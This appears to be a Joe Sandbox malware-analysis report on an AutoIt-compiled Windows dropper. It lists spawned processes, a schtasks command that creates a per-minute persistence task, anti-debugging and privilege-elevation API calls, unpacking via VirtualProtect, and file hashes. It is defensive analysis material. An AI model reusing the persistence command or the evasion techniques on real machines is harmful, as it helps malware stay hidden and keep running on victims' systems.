Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff620390000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	05:25:18
Start date:	30/12/2024
Path:	C:\Windows\SysWOW64\wscript.exe
Wow64 process (32bit):	true
Commandline:	WSCript C:\Users\user\AppData\Local\Temp\WSFDII.vbs
Imagebase:	0x900000
File size:	147'456 bytes
MD5 hash:	FF00E0480075B095948000BDC66E81F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_ProcessChecker, Description: Yara detected ProcessChecker, Source: 00000007.00000002.2594422072.0000000002FC8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_ProcessChecker, Description: Yara detected ProcessChecker, Source: 00000007.00000002.2593322500.00000000029C0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	8
Start time:	05:25:18
Start date:	30/12/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	schtasks /create /tn WSFDII.exe /tr C:\Users\user\AppData\Roaming\Windata\VZVDVH.exe /sc minute /mo 1
Imagebase:	0x10000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	05:25:19
Start date:	30/12/2024
Path:	C:\Users\user\AppData\Roaming\Windata\VZVDVH.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\Windata\VZVDVH.exe
Imagebase:	0x380000
File size:	958'976 bytes
MD5 hash:	BDFE0E6CBA45083DA1F97E4BA1B8D14F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 50%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	05:25:26
Start date:	30/12/2024
Path:	C:\Users\user\AppData\Roaming\Windata\VZVDVH.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\Windata\VZVDVH.exe"
Imagebase:	0x380000
File size:	958'976 bytes
MD5 hash:	BDFE0E6CBA45083DA1F97E4BA1B8D14F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	05:25:35
Start date:	30/12/2024
Path:	C:\ProgramData\Synaptics\Synaptics.exe
Wow64 process (32bit):	true
Commandline:	"C:\ProgramData\Synaptics\Synaptics.exe"
Imagebase:	0x400000
File size:	771'584 bytes
MD5 hash:	7103F3EEC43BBABE34068295157F9F1C
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	Borland Delphi
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	05:25:43
Start date:	30/12/2024
Path:	C:\Users\user\AppData\Roaming\Windata\VZVDVH.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\Windata\VZVDVH.exe"
Imagebase:	0x380000
File size:	958'976 bytes
MD5 hash:	BDFE0E6CBA45083DA1F97E4BA1B8D14F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	05:25:48
Start date:	30/12/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 7936 -s 7400
Imagebase:	0x780000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	05:25:51
Start date:	30/12/2024
Path:	C:\Users\user\AppData\Roaming\Windata\VZVDVH.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\Windata\VZVDVH.exe"
Imagebase:	0x380000
File size:	958'976 bytes
MD5 hash:	BDFE0E6CBA45083DA1F97E4BA1B8D14F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	05:26:01
Start date:	30/12/2024
Path:	C:\Users\user\AppData\Roaming\Windata\VZVDVH.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\Windata\VZVDVH.exe
Imagebase:	0x380000
File size:	958'976 bytes
MD5 hash:	BDFE0E6CBA45083DA1F97E4BA1B8D14F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	05:27:00
Start date:	30/12/2024
Path:	C:\Users\user\AppData\Roaming\Windata\VZVDVH.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\Windata\VZVDVH.exe
Imagebase:	0x380000
File size:	958'976 bytes
MD5 hash:	BDFE0E6CBA45083DA1F97E4BA1B8D14F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	05:27:20
Start date:	30/12/2024
Path:	C:\Windows\splwow64.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\splwow64.exe 12288
Imagebase:	0x7ff756300000
File size:	163'840 bytes
MD5 hash:	77DE7761B037061C7C112FD3C5B91E73
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	6%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	7.5%
Total number of Nodes:	2000
Total number of Limit Nodes:	116

Executed Functions

Function 0041374E Relevance: 22.9, APIs: 9, Strings: 4, Instructions: 145
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentDirectoryW.KERNEL32(00000104,?,00000000,00000001), ref: 0041376D

Part of subcall function 00414257: GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\._cache_KOGJZW.exe,00000104,?,00000000,00000001,00000000), ref: 0041428C

IsDebuggerPresent.KERNEL32(?,?), ref: 0041377F
GetFullPathNameW.KERNEL32(C:\Users\user\Desktop\._cache_KOGJZW.exe,00000104,?,004D1120,C:\Users\user\Desktop\._cache_KOGJZW.exe,004D1124,?,?), ref: 004137EE

Part of subcall function 004134F3: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 0041352A

SetCurrentDirectoryW.KERNEL32(?), ref: 00413860
MessageBoxA.USER32(00000000,This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.,004C2934,00000010), ref: 004821C5
SetCurrentDirectoryW.KERNEL32(?,?), ref: 004821FD
GetModuleFileNameW.KERNEL32(00000000,?,00000104,?), ref: 00482232
GetForegroundWindow.USER32(runas,?,?,?,00000001,?,004ADAA4), ref: 00482290
ShellExecuteW.SHELL32(00000000), ref: 00482297

Part of subcall function 004130A5: GetSysColorBrush.USER32(0000000F), ref: 004130B0
Part of subcall function 004130A5: LoadCursorW.USER32(00000000,00007F00), ref: 004130BF
Part of subcall function 004130A5: LoadIconW.USER32(00000063), ref: 004130D5
Part of subcall function 004130A5: LoadIconW.USER32(000000A4), ref: 004130E7
Part of subcall function 004130A5: LoadIconW.USER32(000000A2), ref: 004130F9
Part of subcall function 004130A5: RegisterClassExW.USER32(?), ref: 00413167

Part of subcall function 00412E9D: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000), ref: 00412ECB
Part of subcall function 00412E9D: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00412EEC
Part of subcall function 00412E9D: ShowWindow.USER32(00000000), ref: 00412F00
Part of subcall function 00412E9D: ShowWindow.USER32(00000000), ref: 00412F09

Part of subcall function 00413598: _memset.LIBCMT ref: 004135BE
Part of subcall function 00413598: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00413667

Strings

C:\Users\user\Desktop\._cache_KOGJZW.exe, xrefs: 004137B4, 004137E9, 004137FD, 00482257
This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support., xrefs: 004821BE
"M, xrefs: 0041379D
runas, xrefs: 0048228B

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: Window$IconLoadName$CurrentDirectory$CreateFileFullModulePathShow$BrushClassColorCursorDebuggerExecuteForegroundMessageNotifyPresentRegisterShellShell__memset
String ID: C:\Users\user\Desktop\._cache_KOGJZW.exe$This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.$runas$"M
API String ID: 4253510256-3080561872
Opcode ID: 25bac411547ef5346a5c02442289f400e8a8a81e81125fa958add87ea27e3b6d
Instruction ID: 6537c55cc3c472376222430fa31d1ccfa7b61d37c9188ec8c5254ae61947996c
Opcode Fuzzy Hash: 25bac411547ef5346a5c02442289f400e8a8a81e81125fa958add87ea27e3b6d
Instruction Fuzzy Hash: 98510A74A44244BACB10BFA19D46FEE3B689B19715F10007BFA41922A1D7B84AC5CB6E

Function 004730AD Relevance: 16.9, APIs: 11, Instructions: 397
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00473AF7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00472AA6,?,?), ref: 00473B0E

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0047317F

Part of subcall function 004184A6: __swprintf.LIBCMT ref: 004184E5
Part of subcall function 004184A6: __itow.LIBCMT ref: 00418519

RegQueryValueExW.KERNEL32(?,?,00000000,?,00000000,?), ref: 0047321E
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 004732B6
RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 004734F5
RegCloseKey.ADVAPI32(00000000), ref: 00473502

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
String ID:
API String ID: 1240663315-0
Opcode ID: 813ab955606889634f0c1a91239d794e3349466d84a0687183be6805f5bcf900
Instruction ID: ec2d2ab0ef5305f2b13c9418d0f9a2953171d40f400075cd84b07cbf814077f0
Opcode Fuzzy Hash: 813ab955606889634f0c1a91239d794e3349466d84a0687183be6805f5bcf900
Instruction Fuzzy Hash: 91E17B31604210AFCB14DF25C891D6BBBE8EF88318F04856EF84ADB261DB35ED45DB56

Function 004129C2 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151
timewindowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtdllDefWindowProc_W.NTDLL(?,?,?,?), ref: 00412A33
KillTimer.USER32(?,00000001), ref: 00412A5D
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00412A80
RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 00412A8B
CreatePopupMenu.USER32 ref: 00412A9F
PostQuitMessage.USER32(00000000), ref: 00412AAE

Strings

TaskbarCreated, xrefs: 00412A86

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: Timer$ClipboardCreateFormatKillMenuMessageNtdllPopupPostProc_QuitRegisterWindow
String ID: TaskbarCreated
API String ID: 157504867-2362178303
Opcode ID: 56863fb0b8e8a9523a23f956c9a7a180cae3322d08b4fb2917113b0494b6f02b
Instruction ID: ac10c841a27f10b0e3decd2ad6f1918c105d1384b89d2eb3b2286511ed7001e1
Opcode Fuzzy Hash: 56863fb0b8e8a9523a23f956c9a7a180cae3322d08b4fb2917113b0494b6f02b
Instruction Fuzzy Hash: 83410831200245ABDB25BF689E09BFA3755EF14380F044537FD02D22A1D6ED9CE0936E

Function 0042E47B Relevance: 10.7, APIs: 7, Instructions: 175COMMON

Download Yara Rule

APIs

GetVersionExW.KERNEL32(?,00000000), ref: 0042E4A7

Part of subcall function 00417E53: _memmove.LIBCMT ref: 00417EB9

GetCurrentProcess.KERNEL32(00000000,004ADC28,?,?), ref: 0042E567
GetNativeSystemInfo.KERNEL32(?,004ADC28,?,?), ref: 0042E5BC
FreeLibrary.KERNEL32(00000000,?,?), ref: 0042E5C7
FreeLibrary.KERNEL32(00000000,?,?), ref: 0042E5DA
GetSystemInfo.KERNEL32(?,004ADC28,?,?), ref: 0042E5E4
GetSystemInfo.KERNEL32(?,004ADC28,?,?), ref: 0042E5F0

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: InfoSystem$FreeLibrary$CurrentNativeProcessVersion_memmove
String ID:
API String ID: 2717633055-0
Opcode ID: e0bd1e4912e184180300c364e6fb725379d9dc3d228234a428af3fc25cbc6b0b
Instruction ID: a68cf21d41aa5cc2a0cc4b1ca122b45901611013c625831980b3360f061965da
Opcode Fuzzy Hash: e0bd1e4912e184180300c364e6fb725379d9dc3d228234a428af3fc25cbc6b0b
Instruction Fuzzy Hash: FD6106B19192A0DFCF15DFA5A4C01EE7FA06F2A304F5849DAD8449B307D638C949CB2A

Function 004131F2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61COMMON

Download Yara Rule

APIs

CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00413202
FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000), ref: 00413219
LoadResource.KERNEL32(?,00000000), ref: 004857D7
SizeofResource.KERNEL32(?,00000000), ref: 004857EC
LockResource.KERNEL32(?), ref: 004857FF

Strings

SCRIPT, xrefs: 0041320F

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: Resource$CreateFindGlobalLoadLockSizeofStream
String ID: SCRIPT
API String ID: 3051347437-3967369404
Opcode ID: 8612bc7558cc352acf719984ed9692c62e8ba69db38e539b53076385a38d2135
Instruction ID: e25a5fe335d17ef592984d1f688571a327fbf673d98f0f47edbb5f9d99e97d67
Opcode Fuzzy Hash: 8612bc7558cc352acf719984ed9692c62e8ba69db38e539b53076385a38d2135
Instruction Fuzzy Hash: 0C117C70600701BFE721AF65EC48F677BB9EBC9B42F2088BAF51286250DB71DD008A74

Function 00456F5B Relevance: 9.1, APIs: 6, Instructions: 71processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00456F7D
Process32FirstW.KERNEL32(00000000,0000022C), ref: 00456F8D
Process32NextW.KERNEL32(00000000,0000022C), ref: 00456FAC
__wsplitpath.LIBCMT ref: 00456FD0
_wcscat.LIBCMT ref: 00456FE3
CloseHandle.KERNEL32(00000000,?,00000000), ref: 00457022

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath_wcscat
String ID:
API String ID: 1605983538-0
Opcode ID: 8e206c8380bf7b333c8149a616d809507125f3da4ef1bbe9663efa1a149a8dfa
Instruction ID: d10ff65a1bdf1e18778339978939ae8681656aa015c37af7178d92a0c2166b6c
Opcode Fuzzy Hash: 8e206c8380bf7b333c8149a616d809507125f3da4ef1bbe9663efa1a149a8dfa
Instruction Fuzzy Hash: 302198B1904218ABDB10AF94DC89BEEB7FCAB08704F1004BAF905D3141E7759F84CB64

Function 0057D0C0 Relevance: 7.7, APIs: 5, Instructions: 206librarymemoryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?), ref: 0057D1FA
GetProcAddress.KERNEL32(?,00576FF9), ref: 0057D218
ExitProcess.KERNEL32(?,00576FF9), ref: 0057D229
VirtualProtect.KERNEL32(00410000,00001000,00000004,?,00000000), ref: 0057D277
VirtualProtect.KERNEL32(00410000,00001000), ref: 0057D28C

Memory Dump Source

Source File: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: ProtectVirtual$AddressExitLibraryLoadProcProcess
String ID:
API String ID: 1996367037-0
Opcode ID: 28022fa3cc7aadfcc30e6f446774a779a08c313db1f9d32069bbfc8a9cdf429e
Instruction ID: 5e0795e24ec06a2af468c7e0ce0f21be50ab7666b2d0e80d927b0ad75e973d72
Opcode Fuzzy Hash: 28022fa3cc7aadfcc30e6f446774a779a08c313db1f9d32069bbfc8a9cdf429e
Instruction Fuzzy Hash: 76510772A543524AD7209EB8ECC4660BFB0FF51320B684739C5EAC73C6E794580AE770

Function 0045EFCD Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261comCOMMON

Download Yara Rule

APIs

Part of subcall function 004578AD: GetFullPathNameW.KERNEL32(?,00000105,?,?), ref: 004578CB

CoInitialize.OLE32(00000000), ref: 0045F04D
CoCreateInstance.COMBASE(0049DA7C,00000000,00000001,0049D8EC,?), ref: 0045F066
CoUninitialize.COMBASE ref: 0045F083

Part of subcall function 004184A6: __swprintf.LIBCMT ref: 004184E5
Part of subcall function 004184A6: __itow.LIBCMT ref: 00418519

Strings

.lnk, xrefs: 0045F02B, 0045F03D

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
String ID: .lnk
API String ID: 2126378814-24824748
Opcode ID: 3867f19a80bcfec51b06c8598bf98d3527d119acc10e0f8bfe02e278825d2ea2
Instruction ID: 47e085bd453ccaf84c0492cefde147ab8f68358425f8d36a37bee29eb48a300b
Opcode Fuzzy Hash: 3867f19a80bcfec51b06c8598bf98d3527d119acc10e0f8bfe02e278825d2ea2
Instruction Fuzzy Hash: EBA17975604301AFC700DF14C884D5ABBE5BF88314F14859EF89A9B3A2DB35EC49CB96

Function 0041DCD0 Relevance: 5.8, APIs: 2, Strings: 1, Instructions: 540COMMON

Download Yara Rule

Strings

G-A, xrefs: 0041DD94, 0041DF2B

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID:
String ID: G-A
API String ID: 0-2875550142
Opcode ID: 946415ea26bb1599549ee7e5e999b0ceddb15928759fd2733931bf326473ebda
Instruction ID: 4210b37faa2b67d8ad7c16dfe25152214a863c938f99841e4952773c310d681b
Opcode Fuzzy Hash: 946415ea26bb1599549ee7e5e999b0ceddb15928759fd2733931bf326473ebda
Instruction Fuzzy Hash: 4422CCB5E002159FCB24DF58C490AEEB7F0FF18304F14816EE8469B351E779A986CB99

Function 0042DD92 Relevance: 4.5, APIs: 3, Instructions: 26fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(0041C848,0041C848), ref: 0042DDA2
FindFirstFileW.KERNEL32(0041C848,?), ref: 00484A83

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: File$AttributesFindFirst
String ID:
API String ID: 4185537391-0
Opcode ID: ef265ec785368d0a53a66acd3d596c4ed765d72c4b36ebc7135d1f8d8ba95c9a
Instruction ID: 4f7a4a2d5290377dccad8e79abb3cc00d3446fb24e602d32f56642dfdf3e2ae8
Opcode Fuzzy Hash: ef265ec785368d0a53a66acd3d596c4ed765d72c4b36ebc7135d1f8d8ba95c9a
Instruction Fuzzy Hash: 0DE0D832C14811574218677CEC0E8EA775C9E45338B500B27F875C21F0EB749D4186DE

Function 00423680 Relevance: 2.5, APIs: 1, Instructions: 986COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: BuffCharUpper
String ID:
API String ID: 3964851224-0
Opcode ID: ecad2d0119658e82d73ceb81ea515b2fce08ceb3f26fc703f4bdc7041b023188
Instruction ID: 27f264bd476357000d75ab3eeec25e82304891d6e87dab8a72ccff0796d1be01
Opcode Fuzzy Hash: ecad2d0119658e82d73ceb81ea515b2fce08ceb3f26fc703f4bdc7041b023188
